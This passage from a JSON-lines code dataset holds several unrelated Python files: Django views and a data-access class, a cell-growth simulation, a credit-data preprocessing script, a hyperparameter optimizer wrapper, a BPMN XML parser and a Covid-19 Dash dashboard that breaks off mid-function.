get_context_data(self, **kwargs):\n context = super(RegistrarPaisView, self).get_context_data(**kwargs)\n context['form'] = self.form_class\n context['titulo'] = 'Registrar país'\n context['titulo_tabla'] = 'Registrar'\n context['subtitulo_tabla'] = 'país'\n context['icono_form'] = 'plus'\n context['activar_nomencladores'] = True\n context['path'] = [\n {'name': 'Nomencladores'},\n {'name': 'País', 'href': reverse_lazy('paises')},\n {'name': 'Registrar', 'href': reverse_lazy('registrar_pais')}\n ]\n return context\n\n def form_valid(self, form):\n form.save()\n messages.add_message(self.request, messages.SUCCESS, \"País agregado con éxito.\")\n return super(RegistrarPaisView, self).form_valid(form)\n\n\nclass ModificarPaisView(PermissionRequiredMixin, UpdateView):\n model = Pais\n template_name = \"pais/pais_form.html\"\n form_class = PaisForm\n success_url = reverse_lazy('paises')\n permission = 'nomencladores.change_pais'\n\n def get_context_data(self, **kwargs):\n context = super(ModificarPaisView, self).get_context_data(**kwargs)\n context['titulo'] = 'Modificar país'\n context['titulo_tabla'] = \"Modificar\"\n context['subtitulo_tabla'] = \"país\"\n context['icono_form'] = 'edit'\n context['activar_nomencladores'] = True\n context['path'] = [\n {'name': 'Nomencladores'},\n {'name': 'País', 'href': reverse_lazy('paises')},\n {'name': 'Modificar', 'href': reverse_lazy('modificar_pais', kwargs={'pk': self.kwargs['pk']})},\n ]\n return context\n\n def form_valid(self, form):\n form.save()\n messages.add_message(self.request, messages.SUCCESS, \"País modificado con éxito.\")\n return super(ModificarPaisView, self).form_valid(form)\n\n\nclass HabilitarPaisView(PermissionRequiredMixin, View):\n permission = 'nomencladores.enable_pais'\n\n def get(self, request, *args, **kwargs):\n pais = Pais.objects.get(id=self.kwargs['pk'])\n pais.activo = True\n pais.save()\n messages.add_message(request, messages.SUCCESS, \"País habilitado con éxito.\")\n return JsonResponse({})\n\n\nclass DeshabilitarPaisView(PermissionRequiredMixin, View):\n permission = 'nomencladores.disable_pais'\n\n def get(self, request, *args, **kwargs):\n pais = Pais.objects.get(id=self.kwargs['pk'])\n pais.activo = False\n pais.save()\n messages.add_message(request, messages.SUCCESS, \"País deshabilitado con éxito.\")\n return JsonResponse({})\n\n","repo_name":"freecubankasper/EppEstudio","sub_path":"eppEstudio50/nomencladores/views/pais.py","file_name":"pais.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"41372900297","text":"\ndef my_pow(num):\n \"Calculates power 2 of a given number!\"\n return num ** 2\n\n\n\nprint(help(abs), \"\\n\", help(int), \"\\n\", help(len), \"\\n\", help(my_pow))\n\nprint(abs.__doc__)\n\n\n\"\"\"\n\nprint(abs.__doc__)\nprint(int.__doc__)\nprint(input.__doc__)\n\ndef square(num):\n '''Return the square value of the input number.\n \n The input number must be integer.\n '''\n return num ** 2\n\nprint(square(2))\nprint(square.__doc__)\n\n\"\"\"","repo_name":"MuhammetALAPAN/Python-Exercises","sub_path":"Beginner/q24.py","file_name":"q24.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"10126435950","text":"import numpy as np\nfrom vivarium import DivideCondition, MetaDivision\nfrom vivarium.core.process import Process, Composer\n\nfrom vivarium.core.composition import composer_in_experiment\n\n\nclass Growth(Process):\n defaults = {\n 'growth_rate': 5e-4}\n\n def __init__(self, parameters=None):\n super().__init__(parameters)\n\n def ports_schema(self):\n return {\n 'biomass': {\n '_default': 1.0,\n '_emit': True,\n '_divider': 'split',\n }\n }\n\n def initial_state(self, config):\n return {\n 'biomass': 10.0}\n\n def next_update(self, timestep, states):\n biomass = states['biomass']\n total_biomass = biomass * np.exp(self.parameters['growth_rate'] * timestep)\n delta_biomass = total_biomass - states['biomass']\n return {\n 'biomass': delta_biomass}\n\n\nclass Expression(Process):\n defaults = {\n 'expression_rate': 1e-1}\n\n def ports_schema(self):\n return {\n 'biomass': {},\n 'genes': {\n '*': {\n 'activation': {'_default': 0.0},\n 'copy_number': {\n '_default': 1,\n '_emit': True,\n }}},\n 'proteins': {\n '*': {\n 'count': {\n '_default': 0,\n '_divider': 'split',\n '_emit': True,\n },\n 'mw': {'_default': 1}}}}\n\n def initial_state(self, config):\n return {\n 'genes': {\n 'growth': {\n 'activation': 1.0,\n 'copy_number': 1}},\n 'proteins': {\n 'growth': {\n 'count': 10,\n 'mw': 1.0}}}\n\n def next_update(self, timestep, states):\n biomass = states['biomass']\n genes = states['genes']\n proteins = states['proteins']\n\n protein_created = {}\n biomass_used = 0\n for gene, gene_state in genes.items():\n protein_created[gene] = self.parameters['expression_rate'] * biomass * timestep * gene_state['activation'] * gene_state['copy_number']\n biomass_used += protein_created[gene] * proteins[gene]['mw']\n\n update = {\n 'biomass': -biomass_used,\n 'proteins': {\n protein: {\n 'count': count}\n for protein, count in protein_created.items()}}\n return update\n\n\nclass Replication(Process):\n defaults = {\n 'elongation_rate': 10,\n 'nucleotide_mw': 0.01} # base pairs / second\n\n def ports_schema(self):\n return {\n 'biomass': {},\n 'dna_polymerase_position': {\n '_default': 0.0},\n 'genes': {\n '*': {\n 'activation': {'_default': 0.0},\n 'copy_number': {\n '_default': 1,\n '_divider': 'split'},\n 'length': {'_default': 1000.0},\n }\n }\n }\n\n def initial_state(self, config):\n return {\n 'dna_polymerase_position': 0.0}\n\n def next_update(self, timestep, states):\n position = states['dna_polymerase_position']\n position_delta = self.parameters['elongation_rate'] * timestep\n new_position = position + position_delta\n biomass_used = position_delta * self.parameters['nucleotide_mw']\n\n update = {\n 'biomass': -biomass_used,\n 'genes': {}}\n\n cursor = 0.0\n for gene_key, gene in states['genes'].items():\n cursor += gene['length']\n if position < cursor and cursor <= new_position:\n update['genes'][gene_key] = {}\n update['genes'][gene_key]['copy_number'] = states['genes'][gene_key]['copy_number']\n \n if new_position >= cursor:\n update['dna_polymerase_position'] = position_delta - cursor\n else:\n update['dna_polymerase_position'] = position_delta\n\n return update\n\n\nclass Cell(Composer):\n defaults = {\n 'growth': {},\n 'expression': {},\n 'replication': {},\n 'divide_condition': {\n 'threshold': 20},\n 'daughter_path': tuple(),\n 'agents_path': tuple(),\n }\n\n def generate_processes(self, config):\n\n # division config\n daughter_path = config['daughter_path']\n agent_id = config['agent_id']\n division_config = dict(\n config.get('division', {}),\n daughter_path=daughter_path,\n agent_id=agent_id,\n composer=self)\n\n return {\n 'growth': Growth(config['growth']),\n 'expression': Expression(config['expression']),\n 'replication': Replication(config['replication']),\n 'divide_condition': DivideCondition(config['divide_condition']),\n 'meta_division': MetaDivision(division_config),\n # 'burst': Burst(),\n }\n\n def generate_topology(self, config):\n return {\n 'growth': {\n 'biomass': ('biomass',),\n },\n 'expression': {\n 'biomass': ('biomass',),\n 'genes': ('genes',),\n 'proteins': ('proteins',)},\n 'replication': {\n 'biomass': ('biomass',),\n 'genes': ('genes',),\n 'dna_polymerase_position': ('dna', 'polymerase_position')\n },\n 'divide_condition': {\n 'variable': ('biomass',),\n 'divide': ('boundary', 'divide',),\n },\n 'meta_division': {\n 'global': ('boundary',),\n 'agents': config['agents_path'],\n },\n # 'burst': {}\n }\n\n\ndef test_cell():\n cell_config = {\n 'agent_id': '1',\n 'agents_path': ('agents',),\n 'growth': {'growth_rate': 1e-1},\n }\n cell_composer = Cell(cell_config)\n initial_state = {\n 'agents': {\n '1': cell_composer.initial_state()}}\n\n cell_experiment = composer_in_experiment(\n cell_composer,\n initial_state=initial_state,\n outer_path=('agents', '1'))\n\n cell_experiment.update(10)\n\n timeseries = cell_experiment.emitter.get_timeseries()\n\n\nif __name__ == '__main__':\n test_cell()\n","repo_name":"vivarium-collective/phage-cycle","sub_path":"phage_cycle/composites/cell.py","file_name":"cell.py","file_ext":"py","file_size_in_byte":6470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"7699926770","text":"import pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing,cross_validation,svm,neighbors\nfrom sklearn.decomposition import PCA\nfrom sklearn.model_selection import train_test_split\nimport time\nimport matplotlib.pyplot as plt\nimport csv\nfrom fancyimpute import KNN , IterativeImputer \nfrom MICE import MiceImputer\n# from fancyimpute import MICE as MICE\ndf_train = pd.read_csv(\"../Training_dataset_Original.csv\")\n\nprint(df_train.shape)\n\n# def remove_outlier(df_in, col_name):\n# q1 = df_in[col_name].quantile(0.001)\n# q3 = df_in[col_name].quantile(0.99)\n# iqr = q3-q1\n# fence_low = q1-1.5*iqr\n# fence_high = q3+1.5*iqr\n# df_out = df_in.loc[(df_in[col_name] > fence_low) & (df_in[col_name] < fence_high)]\n# return df_out\n\n# keys = df_train.keys()\n# for key in keys:\n# \tif(\"mvar\" in key and key not in ['mvar11','mvar41','mvar40','mvar31','mvar23','mvar30', 'mvar22', 'mvar21','mvar14','mvar4','mvar5','mvar18','mvar35','mvar39','mvar45','mvar46','mvar47']):\n# \t\tdf_train = remove_outlier(df_train, key)\n\n\n\ndf_test = pd.read_csv(\"../Leaderboard_dataset.csv\")\nprint(df_test.shape)\n\nrid = np.array(df_test['application_key'])\ny = np.array(df_train['default_ind'])\n\n\ndf_train = df_train.drop(['default_ind', 'application_key'],1)\ndf_test = df_test.drop(['application_key'],1)\n\ntrain_size = len(df_train)\ndf_train = df_train.append(df_test)\n\n\n\ndf_train = df_train.drop(['mvar11','mvar41','mvar40','mvar31','mvar23'], axis=1 )\ndf_train = df_train.drop(['mvar30', 'mvar22', 'mvar21'], axis=1)\n# df_train = df_train.drop(['mvar6', 'mvar8', 'mvar12', 'mvar16', 'mvar24'], axis=1)\n# df_train = df_train.drop(['mvar14','mvar4','mvar5','mvar18','mvar35','mvar39','mvar45','mvar46'], axis=1)\n\nkeys = df_train.keys()\nmapping = {'C':0,'L':1}\ndf_train = df_train.replace({'mvar47':mapping})\n\n\n\n\ndf_train.fillna(df_train.mean(),inplace=True)\n\n# for key in df_train.keys():\n# \tif(\"mvar\" in key and \"mvar47\" not in key):\n# \t\tdf_train[key] = df_train.groupby(\"mvar47\").transform(lambda x: x.fillna(x.mean()))\n\nscaler = preprocessing.StandardScaler()\ndf = df_train\nprint(df_train.describe())\ndf_train = pd.DataFrame(scaler.fit_transform(df_train))\ndf_train.columns = df.columns\ndf_train.index = df.index\n\npca = PCA(n_components=25)\nprincipalComponents = pca.fit_transform(df_train)\nprincipalDf = pd.DataFrame(data = principalComponents)\ndf_train = principalDf\n\n\n\n\n\n\n\ndf_test = df_train[train_size:]\ndf_train = df_train[:train_size]\n\n\ndf_train[\"default_ind\"] = y\ndf_test[\"application_key\"] = rid\n\ndf_test.to_csv(\"../test_final1.csv\", index=False);\ndf_train.to_csv(\"../train_final1.csv\", index=False);\n","repo_name":"sahilchaturvedi/CreditCard-Defaulter","sub_path":"code_rf.py","file_name":"code_rf.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"69800158832","text":"from ...models import paciente\nfrom ..modelo.Paciente import Paciente\n'''\n@package Control\n@version: 0.1.20\n@author: Olman Castilla, Fernanda Alvarado y Yonnattan Serrano\nDocumentation for a class.\nClase DaoBDPaciente.\n'''\n\n\nclass DaoBDPaciente:\n def __init__(self):\n # The constructor.\n self.dato = None\n '''\n Documentation guardar_informacion_paciente.\n @param self :\n @param datos : DTOPaciente\n @return true\n '''\n def guardar_informacion_paciente(self, datos):\n try:\n self.dato = paciente(edad=datos.edad,\n estimacion_edad=datos.estimacion_edad,\n url_imagen=datos.url_imagen,\n nombre=datos.nombre,\n apellido_1=datos.apellido_1,\n apellido_2=datos.apellido_2,\n cedula=datos.cedula,\n hospital=datos.hospital)\n self.dato.save()\n except:\n return False\n return True\n def cargar_informacion(self):\n \n return paciente.objects.all()","repo_name":"olman1995/ASC-Proyecto-IS-2018","sub_path":"website/main/back_end/control/DaoBDPaciente.py","file_name":"DaoBDPaciente.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"3456142420","text":"# Author: Tanish Shinde\n# Email: simon.blanke@yahoo.com\n# License: MIT License\n\nimport time\nimport warnings\n\nfrom .main_args import MainArgs\nfrom .opt_args import Arguments\n\nfrom . import (\n HillClimbingOptimizer,\n StochasticHillClimbingOptimizer,\n TabuOptimizer,\n RandomSearchOptimizer,\n RandomRestartHillClimbingOptimizer,\n RandomAnnealingOptimizer,\n SimulatedAnnealingOptimizer,\n StochasticTunnelingOptimizer,\n ParallelTemperingOptimizer,\n ParticleSwarmOptimizer,\n EvolutionStrategyOptimizer,\n BayesianOptimizer,\n)\n\n\ndef stop_warnings():\n # because sklearn warnings are annoying when they appear 100 times\n def warn(*args, **kwargs):\n pass\n\n import warnings\n\n warnings.warn = warn\n\n\nclass Cypher:\n \"\"\"\n Optimization main class.\n \"\"\"\n\n def __init__(self, X, y, memory=True, random_state=1, verbosity=2, warnings=False):\n \"\"\"\n \n Parameters:\n X: array-like or None\n Training input samples used during the optimization process.\n The training data is passed to the ``X`` argument in the objective function during the optimization process.\n You can also pass ``None`` if you want to optimize an objective function that does not contain a machine learning model.\n\n y: array-like or None\n Training target values used during the optimization process.\n The target values are passed to the ``y`` argument in the objective function during the optimization process.\n You can also pass ``None`` if you want to optimize an objective function that does not contain a machine learning model.\n\n memory: bool, optional (default: True)\n\n random_state: int, optional (default: 1)\n\n verbosity: int, optional (default: 2)\n\n warnings: bool, optional (default: False)\n\n \n Returns:\n --------\n None\n \n \"\"\"\n self._main_args_ = MainArgs(X, y, memory, random_state, verbosity)\n\n if not warnings:\n stop_warnings()\n\n self.optimizer_dict = {\n \"HillClimbing\": HillClimbingOptimizer,\n \"StochasticHillClimbing\": StochasticHillClimbingOptimizer,\n \"TabuSearch\": TabuOptimizer,\n \"RandomSearch\": RandomSearchOptimizer,\n \"RandomRestartHillClimbing\": RandomRestartHillClimbingOptimizer,\n \"RandomAnnealing\": RandomAnnealingOptimizer,\n \"SimulatedAnnealing\": SimulatedAnnealingOptimizer,\n \"StochasticTunneling\": StochasticTunnelingOptimizer,\n \"ParallelTempering\": ParallelTemperingOptimizer,\n \"ParticleSwarm\": ParticleSwarmOptimizer,\n \"EvolutionStrategy\": EvolutionStrategyOptimizer,\n \"Bayesian\": BayesianOptimizer,\n }\n\n def search(\n self,\n search_config,\n max_time=None,\n n_iter=10,\n optimizer=\"RandomSearch\",\n n_jobs=1,\n warm_start=False,\n scatter_init=False,\n ):\n \"\"\"\n run search\n \n Parameters\n ----------\n search_config: dictionary\n Defines the search space and links it to the objective function. \n The objective function is the key of the dictionary, while the search space (which is also a dictionary) is the value.\n You can define multiple modeles/search-spaces in the search_config.\n The values within the search space (not search_config) must be lists or numpy arrays.\n \n Example:\n def model_function(para, X, y):\n model = GradientBoostingClassifier(\n n_estimators=para[\"n_estimators\"],\n max_depth=para[\"max_depth\"],\n )\n scores = cross_val_score(model, X, y, cv=3)\n\n return scores.mean()\n\n\n search_config = {\n model_function: {\n \"n_estimators\": range(10, 200, 10),\n \"max_depth\": range(2, 12),\n }\n }\n \n \n max_time: float, optional (default: None)\n \n n_iter: int, optional (default: 10)\n \n optimizer: string or dict, optional (default: \"RandomSearch\")\n \n n_jobs: int, optional (default: 1)\n \n warm_start: dict, optional (default: False)\n \n scatter_init: int, optional (default: False)\n \n \n Returns\n -------\n None\n \n \"\"\"\n\n start_time = time.time()\n\n self._main_args_.search_args(\n search_config, max_time, n_iter, optimizer, n_jobs, warm_start, scatter_init\n )\n self._opt_args_ = Arguments(self._main_args_.opt_para)\n optimizer_class = self.optimizer_dict[self._main_args_.optimizer]\n\n try:\n import ray\n\n if ray.is_initialized():\n ray_ = True\n else:\n ray_ = False\n except ImportError:\n warnings.warn(\"failed to import ray\", ImportWarning)\n ray_ = False\n\n if ray_:\n optimizer_class = ray.remote(optimizer_class)\n opts = [\n optimizer_class.remote(self._main_args_, self._opt_args_)\n for job in range(self._main_args_.n_jobs)\n ]\n searches = [\n opt.search.remote(job, ray_=ray_) for job, opt in enumerate(opts)\n ]\n ray.get(searches)\n else:\n self._optimizer_ = optimizer_class(self._main_args_, self._opt_args_)\n self._optimizer_.search()\n\n self.results_params = self._optimizer_.results_params\n self.results_models = self._optimizer_.results_models\n\n self.pos_list = self._optimizer_.pos_list\n self.score_list = self._optimizer_.score_list\n\n self.total_time = time.time() - start_time\n\n def get_total_time(self):\n return self.total_time\n\n def get_eval_time(self):\n return self._optimizer_.eval_time\n\n def save_report(self):\n pass\n","repo_name":"vcs1977/Cypher","sub_path":"cypher/cypher.py","file_name":"cypher.py","file_ext":"py","file_size_in_byte":6122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"16512740743","text":"import logging\n\ntry:\n import xml.etree.cElementTree as ET\nexcept ImportError:\n import xml.etree.ElementTree as ET\n\nimport sys\n\ntry:\n\tfileName = sys.argv[1]\nexcept Exception as e:\n\tlogging.error(\"Usage:python xmltest filename\")\n\texit()\n\n# read file\ntry:\n\t#tree = ET.ElementTree(file='bpmn/new.bpmn')\n\ttree = ET.ElementTree(file=fileName)\n\tfileName\nexcept Exception as e:\n\tlogging.error(\"Error:File not found\"+str(e))\n\texit()\n\n# root element\nroot = tree.getroot()\n\n# Testing code\n'''\n# print everything\nfor elem in tree.iter():\n\tprint (\"TAG: %s ATTRIB: %s\" % (elem.tag, elem.attrib))\n\n# search for tasks\nprint (\">>>>>>>>>>>>>>>>>>>>>>>>>>>> JUST TASKS <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\")\nfor elem in tree.iter(tag='{http://www.omg.org/spec/BPMN/20100524/MODEL}task'):\t\n\ttaskName = elem.attrib['name']\n\ttaskID = elem.attrib['id']\n\tbehaviourName = taskID+\"_behaviour\"\n\t#add behaviour element\n\telem.set('behaviour',behaviourName)\n\tprint (\"TAG: %s ATTRIB: %s\" % (elem.tag, elem.attrib))\n\tprint (elem.attrib['name'])\n'''\n# add behaviours\nfor elem in tree.iter(tag='{http://www.omg.org/spec/BPMN/20100524/MODEL}task'):\t\n\ttaskName = elem.attrib['name']\n\ttaskID = elem.attrib['id']\n\tbehaviourName = taskID+\"_behaviour\"\n\t#add behaviour element\n\telem.set('behaviour',behaviourName)\n\n\t\n\n\nprint(\"# COPY PASTE FROM HERE\")\nprint(\"# define behaviours\")\nfor elem in tree.iter(tag='{http://www.omg.org/spec/BPMN/20100524/MODEL}task'):\t\n\tprint (\"%s = {'Name': '%s', 'averageTime': 7, 'silentFail': 5, 'completionFail': 5}\" % (elem.attrib['behaviour'], elem.attrib['behaviour']))\n\nprint(\"# define tasks\")\nprint(\"tasks = {\")\nfor elem in tree.iter(tag='{http://www.omg.org/spec/BPMN/20100524/MODEL}task'):\t\n\tprint (\"'%s' : {'Name': '%s', 'behaviour': %s},\" % (elem.attrib['id'], elem.attrib['name'], elem.attrib['behaviour']))\n\nprint(\"}\")\t","repo_name":"information-catalyst/iproduce-digital-twin-development-toolkit","sub_path":"services/icebasicdigitaltwinanimator/xmltest.py","file_name":"xmltest.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"44094854735","text":"#!/usr/bin/nv python3\n#\n######################\n# Covid-19 Stats App #\n######################\n#\n# BY: Chadless1\n#\n# Description: Pulls data from mytimes github and uses dash to display charts and graphs \n# analyzing the data by the US and each individual state\n#\nimport pandas as pd\nimport numpy as np\nimport datetime \n\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport plotly.express as px\n\n# Read csv file from github\n# State Data\nurl = 'https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-states.csv'\n\ndf_states = pd.read_csv(url)\n\n# Read csv file from github\n# County Data\n\n#state Codes\nus_state_abbrev = {\n 'Alabama': 'AL',\n 'Alaska': 'AK',\n 'American Samoa': 'AS',\n 'Arizona': 'AZ',\n 'Arkansas': 'AR',\n 'California': 'CA',\n 'Colorado': 'CO',\n 'Connecticut': 'CT',\n 'Delaware': 'DE',\n 'District of Columbia': 'DC',\n 'Florida': 'FL',\n 'Georgia': 'GA',\n 'Guam': 'GU',\n 'Hawaii': 'HI',\n 'Idaho': 'ID',\n 'Illinois': 'IL',\n 'Indiana': 'IN',\n 'Iowa': 'IA',\n 'Kansas': 'KS',\n 'Kentucky': 'KY',\n 'Louisiana': 'LA',\n 'Maine': 'ME',\n 'Maryland': 'MD',\n 'Massachusetts': 'MA',\n 'Michigan': 'MI',\n 'Minnesota': 'MN',\n 'Mississippi': 'MS',\n 'Missouri': 'MO',\n 'Montana': 'MT',\n 'Nebraska': 'NE',\n 'Nevada': 'NV',\n 'New Hampshire': 'NH',\n 'New Jersey': 'NJ',\n 'New Mexico': 'NM',\n 'New York': 'NY',\n 'North Carolina': 'NC',\n 'North Dakota': 'ND',\n 'Northern Mariana Islands':'MP',\n 'Ohio': 'OH',\n 'Oklahoma': 'OK',\n 'Oregon': 'OR',\n 'Pennsylvania': 'PA',\n 'Puerto Rico': 'PR',\n 'Rhode Island': 'RI',\n 'South Carolina': 'SC',\n 'South Dakota': 'SD',\n 'Tennessee': 'TN',\n 'Texas': 'TX',\n 'Utah': 'UT',\n 'Vermont': 'VT',\n 'Virgin Islands': 'VI',\n 'Virginia': 'VA',\n 'Washington': 'WA',\n 'West Virginia': 'WV',\n 'Wisconsin': 'WI',\n 'Wyoming': 'WY'\n}\n\nurl2 = 'https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-counties.csv'\n\ndf = pd.read_csv(url2)\n\n# Filter for last date\ntoday = df['date'].iloc[-1]\n\ndf = df[df['date'] == today]\n\ndf = df.replace(us_state_abbrev)\n\ndf = df.groupby('state')['cases'].sum()\n\n# Plot\nfig = px.choropleth(df, locations=df.index,\n scope='usa',\n color='cases',\n locationmode='USA-states',\n range_color=(0,1000000),\n title='Cases per State',\n )\n\n# Create Date objects\n\ndf_states['date'] = pd.to_datetime(df_states['date'])\n\ndate = df_states['date'].iloc[-1]\ndate = date.strftime('%m-%d-%Y')\n\n############\n# Dash App #\n############\napp = dash.Dash(__name__)\n\n# Layout\napp.layout = html.Div(children=[\n\n # Header image and title\n html.Header(\n html.Div([ \n \n html.Img(src=app.get_asset_url('c19.jpeg')),\n\n html.H1('Covid-19 Data'),\n\n ],className='head')\n\n ),\n\n html.Br(),\n \n # Intro / Date / Links\n html.P('Data on Covid-19 Case Numbers and Deaths for the United States. Search by State and find out more about your area.'),\n \n html.P('Data is currently valid from *{}*'.format(date)),\n\n html.A('data source', href='https://github.com/nytimes/covid-19-data/'),\n\n html.Br(),\n\n html.A('code source', href='https://github.com/chadless1/c19-stats-app/'),\n\n # Line break\n html.Br(),\n html.Hr(),\n html.Br(),\n \n # Tabs\n dcc.Tabs(id=\"tabs\", value='tab-1', children=[\n \n dcc.Tab(label='USA', value='tab-1'),\n dcc.Tab(label='Data By State', value='tab-2'),\n\n ], style={'width': '90%', 'margin': 'auto', 'box-shadow': '0 1px 3px rgba(0,0,0,0.12), 0 1px 2px rgba(0,0,0,0.24)'}, colors={'border': 'grey', 'background': '#082255', 'primary': 'black'}),\n \n # Tab contnent\n html.Div(id='tabs-content'),\n\n ]) # main div tag\n # End of app layout\n\n###########################################################\n# CallBacks #\n###########################################################\n\n# Tab Callbacks\n@app.callback(Output('tabs-content', 'children'),\n [Input('tabs', 'value')])\n\ndef render_content(tab):\n \n # US Case and Death Calculations\n today = df_states['date'].iloc[-1]\n\n df_usa = df_states[df_states['date'] == today]\n \n usa_total_cases = df_usa['cases'].sum()\n usa_total_deaths = df_usa['deaths'].sum()\n\n usa_total_df = df_states[['cases','deaths']].groupby(df_states['date'])\n usa_total_df = usa_total_df.sum()\n\n usa_last = usa_total_df.tail()\n\n # Calculate % Change in Cases and Death\n usa_case_percent = (usa_total_df['cases'].iloc[-1] - usa_total_df['cases'].iloc[-5]) / usa_total_df['cases'].iloc[-5] * 100\n usa_case_percent = round(usa_case_percent, 2)\n\n usa_death_percent = (usa_total_df['deaths'].iloc[-1] - usa_total_df['deaths'].iloc[-5]) / usa_total_df['deaths'].iloc[-5] * 100\n usa_death_percent = round(usa_death_percent, 2)\n \n # New df for graphs\n dff = df_states.groupby('date')[['cases', 'deaths']].sum()\n \n dff = dff.diff()\n dff = dff.fillna(0)\n\n dff_tail = dff.tail() \n\n # Tab 1\n if tab == 'tab-1':\n return html.Div([\n\n html.Div([\n\n html.Br(),\n html.H3('USA Data'),\n html.Br(),\n\n ] ,className='row'),\n\n # Main Div\n html.Div([\n\n # USA Cases\n html.Div([\n\n html.H4('Total Cases'),\n html.H3('{:,}'.format(usa_total_cases)),\n\n ],className='four columns'),\n \n # USA Deaths\n html.Div([\n\n html.H4('Total Deaths'),\n\n html.H3('{:,}'.format(usa_total_deaths)),\n\n ],className='four columns'),\n \n # Choropleth map\n html.Div([\n\n dcc.Graph(figure=fig),\n\n ],className='twelve columns'),\n\n # USA Case Change\n html.Div([\n\n html.H4('Case Change %'),\n\n html.H3('{:,}%'.format(usa_case_percent)),\n html.P('over last 5 Days'),\n\n ],className='four columns'),\n \n # USA Death Change\n html.Div([\n\n html.H4('Death Change %'),\n\n html.H3('{:,}%'.format(usa_death_percent)),\n html.P('over last 5 Days'),\n\n\n ],className='four columns'),\n\n ]),\n\n html.Br(),\n \n # Graphs\n html.Div([\n\n dcc.Graph(\n\n figure={\n\n 'data': [\n \n {'x': dff.index, 'y': dff['cases'].values, 'type': 'line', 'name': 'cases'},\n {'x': dff.index, 'y': dff['deaths'].values, 'type': 'line', 'name': 'deaths'},\n\n ],\n\n 'layout': {\n 'title': 'Cases & Deaths',\n #'height': 310,\n 'paper_bgcolor': '#082255',\n 'plot_bgcolor': '#082255',\n 'font': {'color': 'white'},\n\n }}\n\n ),\n\n ],className='five columns'),\n\n html.Div([\n\n dcc.Graph(\n\n figure={\n\n 'data': [\n \n {'x': dff_tail.index, 'y': dff_tail['cases'].values, 'type': 'bar', 'name': 'cases'},\n\n ],\n\n 'layout': {\n 'title': 'Cases Last 5 Days',\n #'height': 310,\n 'paper_bgcolor': '#082255',\n 'plot_bgcolor': '#082255',\n 'font': {'color': 'white'},\n \n }}\n\n ),\n\n ],className='five columns'),\n\n html.Div([\n\n dcc.Graph(\n\n figure={\n\n 'data': [\n \n {'x': dff_tail.index, 'y': dff_tail['deaths'].values, 'type': 'bar', 'name': 'deaths', 'marker': {'color': 'orange'}},\n\n ],\n\n 'layout': {\n 'title': 'Deaths Last 5 Days',\n #'height': 310,\n 'paper_bgcolor': '#082255',\n 'plot_bgcolor': '#082255',\n 'font': {'color': 'white'},\n \n }}\n\n ),\n\n ],className='five columns'),\n\n\n \n ],className='container')\n\n #########################################################\n # End Tab1\n \n elif tab == 'tab-2':\n return html.Div([\n \n # Tab 2 Content #\n #################\n\n # States\n html.H3('Select State'),\n \n html.Div([\n dcc.Dropdown(id='my-dropdown2',\n \n options=[{'label': i, 'value': i} for i in sorted(df_states['state'].unique())],\n #multi=True,\n value='Massachusetts',\n searchable=False,\n \n ),\n ], style={'margin': 'auto', 'width': '50%', 'text-align': 'center', 'color': 'black'}),\n\n html.Br(),\n\n # Radio Button Graph\n html.Div([\n\n dcc.RadioItems(id='r_button',\n options=[\n {'label': 'Cases', 'value': 'CASES'},\n {'label': 'Deaths', 'value': 'DEATH'},\n {'label': 'Both', 'value': 'BOTH'}\n ],\n value='BOTH',\n labelStyle={'display': 'inline-block', 'margin-bottom': '10px', 'padding': '5px 5px'}\n ) \n\n ],className='row', style={'text-align': 'left', 'margin-left': '90px'}),\n \n # Main Content Div \n\n html.Div([\n \n # graph div\n html.Div([\n\n dcc.Graph(id='graph_1')\n\n ],className='six columns'),\n \n # Data div\n html.Div([\n\n html.Div(id='total_cases'),\n\n ],className='six columns'),\n\n # second graph div\n html.Div([\n\n dcc.Graph(id='graph_2')\n\n ],className='twelve columns'),\n \n ],className='container'),\n ])# end of Tab 2\n\n ##########################################################\n# State Graphs Callback and Functions\n# Case Graph\n\n@app.callback(Output('graph_1', 'figure'),\n [Input('my-dropdown2', 'value'), Input('r_button', 'value')])\n\ndef update_figure(value, button):\n\n if button == 'BOTH':\n\n df3 = df_states[df_states['state'] == value]\n \n df3 = df3.set_index('date')\n \n df4 = df3['cases'].diff()\n df5 = df3['deaths'].diff()\n\n df4 = df4.mask(df4 < 0)\n df5 = df5.mask(df5 < 0)\n\n figure={\n \n 'data': [\n \n {'x': df4.index, 'y': df4, 'type': 'line', 'name': 'cases'},\n {'x': df5.index, 'y': df5, 'type': 'line', 'name': 'deaths'},\n\n ],\n 'layout': {\n 'title': 'Cases & Deaths',\n 'height': 310,\n 'paper_bgcolor': '#082255',\n 'plot_bgcolor': '#082255',\n 'font': {'color': 'white'},\n }}\n\n return(figure)\n\n elif button == 'CASES':\n\n df3 = df_states[df_states['state'] == value]\n \n df3 = df3.set_index('date')\n \n df4 = df3['cases'].diff()\n df5 = df3['deaths'].diff()\n\n df4 = df4.mask(df4 < 0)\n df5 = df5.mask(df5 < 0)\n\n figure={\n \n 'data': [\n \n {'x': df4.index, 'y': df4, 'type': 'line', 'name': 'cases'},\n\n ],\n 'layout': {\n 'title': 'Cases',\n 'paper_bgcolor': '#082255',\n 'plot_bgcolor': '#082255',\n 'font': {'color': 'white'},\n }}\n\n return(figure)\n \n elif button == 'DEATH':\n\n df3 = df_states[df_states['state'] == value]\n \n df3 = df3.set_index('date')\n \n df4 = df3['cases'].diff()\n df5 = df3['deaths'].diff()\n\n df4 = df4.mask(df4 < 